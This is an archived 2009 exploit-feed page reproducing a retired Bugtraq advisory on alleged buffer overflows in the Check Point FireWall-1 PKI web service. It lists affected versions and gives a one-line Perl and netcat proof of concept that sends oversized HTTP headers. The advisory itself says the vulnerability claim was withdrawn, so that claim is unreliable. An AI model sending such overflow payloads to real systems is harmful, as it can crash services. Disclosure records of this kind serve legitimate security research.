|
Feeds -
Exploits
|
|
Written by Bugs NotHugs
|
|
Monday, 06 April 2009 23:04 |
RETIRED: Check Point FireWall-1 PKI Web Service Remote Buffer Overflow Vulnerabilities
-\\Bugtraq ID:
34286
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 30 2009 12:00AM
-\\Updated:
Apr 06 2009 08:46PM
-\\Credit:
Bugs NotHugs
-\\Vulnerable:
Check Point Software FireWall-1 VSX NG with Application Intelligence
Check Point Software FireWall-1 VSX 2.0.1
Check Point Software FireWall-1 R55 HFA08 with SmartDefense
Check Point Software FireWall-1 Next Generation FP3
Check Point Software FireWall-1 Next Generation FP2
Check Point Software FireWall-1 Next Generation FP1
Check Point Software FireWall-1 Next Generation FP0
Check Point Software FireWall-1 GX 3.0
Check Point Software FireWall-1 GX 2.5
Check Point Software FireWall-1 GX 2.0
Check Point Software Firewall-1 [ VPN + DES ] 4.1
Check Point Software Firewall-1 [ VPN + DES + STRONG ] 4.1 SP2 Build 41716
Check Point Software Firewall-1 [ VPN + DES + STRONG ] 4.1 Build 41439
Check Point Software Firewall-1 4.1 SP6
Check Point Software Firewall-1 4.1 SP5a
Check Point Software Firewall-1 4.1 SP5
Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0
Check Point Software Firewall-1 R55W HFA3
Check Point Software Firewall-1 R55W HFA2
Check Point Software Firewall-1 R55W HFA1
Check Point Software Firewall-1 R55W
Check Point Software Firewall-1 NXP R60
Check Point Software Firewall-1
-\\Discussion
Check Point FireWall-1 PKI web service is prone to multiple remote
buffer-overflow vulnerabilities because the application fails to perform
adequate boundary checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code with the
privileges of the user running the affected application. Failed exploit
attempts will result in a denial-of-service condition.
NOTE: This BID is being retired because the application is not vulnerable
as described.
-\\Exploit(s)/PoC(s):
The following proof of concept is available:
perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: example.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.example.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
example.com 18264
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are
in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Check Point Software Homepage
http://www.checkpoint.co (Check Point Software)
--Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
http://www.securityfocus.com/archive/1/50225 (Bugs NotHugs <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
|
